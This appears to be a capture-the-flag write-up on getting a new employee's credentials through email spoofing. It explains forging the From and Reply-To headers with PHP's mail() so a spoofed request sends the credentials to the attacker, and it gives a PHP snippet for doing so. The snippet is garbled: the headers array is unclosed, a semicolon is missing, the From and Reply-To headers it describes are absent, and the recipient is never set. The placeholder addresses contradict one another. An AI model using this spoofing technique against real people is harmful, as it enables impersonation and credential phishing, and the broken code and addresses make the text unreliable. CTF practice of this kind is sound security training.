Hello Some Guy,
We need to begin sending requests for the new employee to get access to our security appliances. I believe they already know that you are authorized to make a new account request. Would you mind sending the new employee’s email address to email@example.com so they can process the account request?
The new employee can be a little slow to respond.
2/26 8:42 am CST: Visting
somebigcorp.comis not part of the challenge
The goal of this challenge is clear. Send an email to firstname.lastname@example.org requesting the credentials for the new employee. Although … we need to be disguised as email@example.com in order to request the credentials. How?
*Email spoofing is the forgery of an email header so that the message appears to have originated from someone or somewhere other than the actual source.*
To use this technique there is a perfect PHP function called mail(). All we need is a PHP server and an email server (check it up how to setup one on google if you don’t know how to do it)
The most important parameters in this case are: From and Reply-To in the additional headers section. In the From argument we put the email we want to spoof and in the Reply-To we chose the email where we want the people that we fooled to send the replies, in this case we want to fool firstname.lastname@example.org.
So to retrieve the flag all we need is:
- PHP Server
- Email Server
- An email where we can receive the credentials (let’s call it email@example.com)
- Call the PHP mail() function from the server.
- Put the email where we want to receive the info into the body of the mail()’s message
Let’s create the file imnotspoofing.php with the following content
$subject = 'Requesting new employee credentials';
$message= 'Hello. I am request the new employee credentials. Can you send them to my email firstname.lastname@example.org. Thanks'
$headers = array(
'X_Mailer: PHP/' . phpversion()
mail($to, $subject, $message, implode("\n", $headers));
Shortly after we running this PHP snippet from our server, we’ll receive an email in our email@example.com with the flag: